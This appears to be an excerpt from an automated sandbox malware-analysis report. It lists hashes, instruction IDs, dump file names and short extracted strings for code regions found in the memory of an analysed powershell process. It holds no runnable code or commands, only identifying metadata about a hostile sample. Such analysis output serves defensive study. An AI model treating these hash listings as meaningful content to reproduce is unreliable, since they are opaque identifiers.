                                • Instruction ID: 55beb7f009d73181162ad14fda656988534774400f4c0d53a170ad19f854b590
                                • Opcode Fuzzy Hash: 2c2c6a6c5612ff4e553d26ba5704da3fc3767cc85ddf03123ed05f68d9d833dd
                                • Instruction Fuzzy Hash: 70A155F170430A8FCB298E28985066ABBE6BFA1314F2485BADC45CB291DF35D941C7A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                                • API String ID: 0-537408273
                                • Opcode ID: 972eb976772557d936afbdfabb0cf4789dafef98052d902fdf9c90bc32f39601
                                • Instruction ID: a48cd699ecf5a3b32f518a5347a48c5246a0b07e0de5be2c9e7b2e31df739629
                                • Opcode Fuzzy Hash: 972eb976772557d936afbdfabb0cf4789dafef98052d902fdf9c90bc32f39601
                                • Instruction Fuzzy Hash: FF6180B070020ADBDB24CE54C5C4BAAB7F2AF99715F5984A5EC05EB291D731EC81CBB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                • API String ID: 0-2778409501
                                • Opcode ID: f00885d3721724009e051a0eec8d99bc1fe02dd3aaedff4cd1d48519b38824dc
                                • Instruction ID: dde8aef753e13de45868e2544a4c213796fa86b414bd5ab44da5cb699f6dbb0e
                                • Opcode Fuzzy Hash: f00885d3721724009e051a0eec8d99bc1fe02dd3aaedff4cd1d48519b38824dc
                                • Instruction Fuzzy Hash: D451A0B070020ADFDB24CE24C584BAAB7B2BB65715F5484A6EC05DB291C771DD85CBB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
                                • API String ID: 0-3562389410
                                • Opcode ID: 521129a6eededd2c446c04bd8ff8979a009c1f0e1002b5faeb61d0c9751c0cdc
                                • Instruction ID: fb9e0427d3c95261f5f2bbb1c54be60045807fd8c25c62a76d31e5ce4c6fced0
                                • Opcode Fuzzy Hash: 521129a6eededd2c446c04bd8ff8979a009c1f0e1002b5faeb61d0c9751c0cdc
                                • Instruction Fuzzy Hash: 3551D0B0A103078FDB25CF19C580B6ABBE2AF65664F1985A6EC41EB291D735EC40CF71
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$t~pq$$]q$$]q$$]q
                                • API String ID: 0-1469378889
                                • Opcode ID: de452bdd0c3d7dfe7b0dd56d5c7062e9d88972d2e9177db18d33920a1d1d1479
                                • Instruction ID: 313da8167c9f3d3bb1debb84e4e12e519ce92bd497f04dff7b9dea50cb86025f
                                • Opcode Fuzzy Hash: de452bdd0c3d7dfe7b0dd56d5c7062e9d88972d2e9177db18d33920a1d1d1479
                                • Instruction Fuzzy Hash: 9D41ABB1F0024E8FD7295E69845837ABBD6AFE5201F64896ACC42CF282DF35C845C352
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$hTk$tP]q$tP]q
                                • API String ID: 0-896718279
                                • Opcode ID: db543484132c75be6fb0ca27599894adbeabe765e7c96f9627f628bf5c7419a3
                                • Instruction ID: 14ca7d446ce17c5f724e3e95cad001d575588d8cd0cf449c1e2560545aa02b3d
                                • Opcode Fuzzy Hash: db543484132c75be6fb0ca27599894adbeabe765e7c96f9627f628bf5c7419a3
                                • Instruction Fuzzy Hash: 96E147B1B44306CFCB248F7C995467ABBE6AFD5314F28C4AADC05DB251EA31D801C761
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$tP]q$$]q$$]q$$]q
                                • API String ID: 0-2702571027
                                • Opcode ID: aa892391c1b1d8ddfcdc830e039a5274d03bbf89d82cc39aa3e32e431188a161
                                • Instruction ID: a9c3ea4ccb5c760e34a2efae8610b22dd7f963e61dd51ee733a071470c0bd35e
                                • Opcode Fuzzy Hash: aa892391c1b1d8ddfcdc830e039a5274d03bbf89d82cc39aa3e32e431188a161
                                • Instruction Fuzzy Hash: 9661C0F070420AEFDB258E55C5C0BAA77E2AF65355F188496EC01DB295C771DC80CBB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$tP]q$$]q$$]q$$]q
                                • API String ID: 0-2702571027
                                • Opcode ID: fa9e16264128ef78fdf1451daf83f1cc6d0d08dc048c57bdcc747e8fa99a0bcc
                                • Instruction ID: d216bf5f80522eb57452dc515262b5c3512692ec91db255e3591269f50d7fa0e
                                • Opcode Fuzzy Hash: fa9e16264128ef78fdf1451daf83f1cc6d0d08dc048c57bdcc747e8fa99a0bcc
                                • Instruction Fuzzy Hash: 3261AEF070420AEFDB248E55C5C0BAAB7E2AF65315F588465EC01DB294C771DC80CBB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                • API String ID: 0-2353078639
                                • Opcode ID: 7baea3ec67583fabe34fbedf13e9c7082e4eb21aa6f1859643ee55f25700ea13
                                • Instruction ID: 8fd736345e188c350e890a6e7d44c746386874b8bfaea6a85d53d60dca102442
                                • Opcode Fuzzy Hash: 7baea3ec67583fabe34fbedf13e9c7082e4eb21aa6f1859643ee55f25700ea13
                                • Instruction Fuzzy Hash: 263189B27442A6CFCB284E689450176BBA1EFF1210B2484BBCC4ECB554CF36C4D2C762
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$tP]q$$]q$$]q$$]q
                                • API String ID: 0-2702571027
                                • Opcode ID: 6922e2a8b70bafe92b634e6e2198a256c8c34f75f3b605b8821134cc7b088da8
                                • Instruction ID: d8ec96acaea933b96d95a0eae19fe1b4d38c136865c00da021f0ef7b256db5e4
                                • Opcode Fuzzy Hash: 6922e2a8b70bafe92b634e6e2198a256c8c34f75f3b605b8821134cc7b088da8
                                • Instruction Fuzzy Hash: CE31D2B0A0460ADFDB288F45C544BAABBE2FF65728F14C167DC55DB290CB32D980CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                • API String ID: 0-1723543176
                                • Opcode ID: 0d0ce9a518df6cac8bf1a4920701e00a49678336343157228c5bca6a7cebbd6a
                                • Instruction ID: c8213c55081e068400eee9202efb583eb1e03909a17bca012118cda3fcff05e3
                                • Opcode Fuzzy Hash: 0d0ce9a518df6cac8bf1a4920701e00a49678336343157228c5bca6a7cebbd6a
                                • Instruction Fuzzy Hash: F231A2B0B00216DFDB24CF69C484A6ABBA2FB98764F158595E805EB350C732EC41CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$$]q$$]q$$]q$$]q
                                • API String ID: 0-2705583504
                                • Opcode ID: 858eac429dae264a55357e12d49c0961bfe02d0b8300f6768e313e66406610bf
                                • Instruction ID: 0d0c9aed0edc73895d6142b7167fd9084a87e4ffcc31c135ac0a35218526a1ee
                                • Opcode Fuzzy Hash: 858eac429dae264a55357e12d49c0961bfe02d0b8300f6768e313e66406610bf
                                • Instruction Fuzzy Hash: 5C219AF522420BDBDB388E09C580A3577E5BF61B65F5943AAEC44CB261DF30D980CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$(o]q$(o]q$(o]q
                                • API String ID: 0-1261621458
                                • Opcode ID: 394db399fb4f17687710ea8adb13c0f08ff038c430bfd8db66909b99439fc81f
                                • Instruction ID: b3c88e130996ff0dc6c02e5fc7846ae642ec90e44cd0ab3e1f875b5e9b27df97
                                • Opcode Fuzzy Hash: 394db399fb4f17687710ea8adb13c0f08ff038c430bfd8db66909b99439fc81f
                                • Instruction Fuzzy Hash: 1CF112B170430BDFDB158F68C840BAABBA2EF95315F1484AAEC05CB291DB35D941CBB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: XRbq$XRbq$tP]q$$]q
                                • API String ID: 0-2385373255
                                • Opcode ID: 552d6cfa4b77653dd408eb15794e312363ec1aea0a88294338b832043644c6f4
                                • Instruction ID: a3c66a39323d0dde11a48e234f597061ddcc070e3f718737b6b0b3539b91c492
                                • Opcode Fuzzy Hash: 552d6cfa4b77653dd408eb15794e312363ec1aea0a88294338b832043644c6f4
                                • Instruction Fuzzy Hash: 8F4171B1B00209DBDB28CE59C584AA9B7F2AFA5714F59C099DC05AB355C731EC41CBB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: ec028e5372971d88b5274820e75c80a0e764d4706c127f026e145bf01ca5c138
                                • Instruction ID: c1e48e538c3e50c09b29589fd5a3a3dd96be00aae577810486ca6324a0b63f01
                                • Opcode Fuzzy Hash: ec028e5372971d88b5274820e75c80a0e764d4706c127f026e145bf01ca5c138
                                • Instruction Fuzzy Hash: 5D216B71B1430E5BDB381A3E8848B37BBD69BE1725F24882A9D45DB281DE77DC40C362
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: a4c9e3a8c4003da3c573517461210f7ae50c923b9fb427fdcb9972e235269b38
                                • Instruction ID: c400d5a23190849554622d1eb6aaf98991df4cc12d5710a0bb64d04ee57cad0f
                                • Opcode Fuzzy Hash: a4c9e3a8c4003da3c573517461210f7ae50c923b9fb427fdcb9972e235269b38
                                • Instruction Fuzzy Hash: 12119DF5A0020ADFDF348F59858066AB7F1ABA5761F1840ABEC45D7201DB31C541CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3054342975.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7850000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q
                                • API String ID: 0-978391646
                                • Opcode ID: 2cbe195761a2505f2c3b0c37341c6cc0470f54d21f37bf6d56552e1af6f38afc
                                • Instruction ID: 814f9b596258581fcb2470d0f50f85572a036962a62ede352211af67089dd09c
                                • Opcode Fuzzy Hash: 2cbe195761a2505f2c3b0c37341c6cc0470f54d21f37bf6d56552e1af6f38afc
                                • Instruction Fuzzy Hash: 4301AD21B0D3CA8FC32B262918342696FB28F92844B1A49D7C881DF296C9198C068367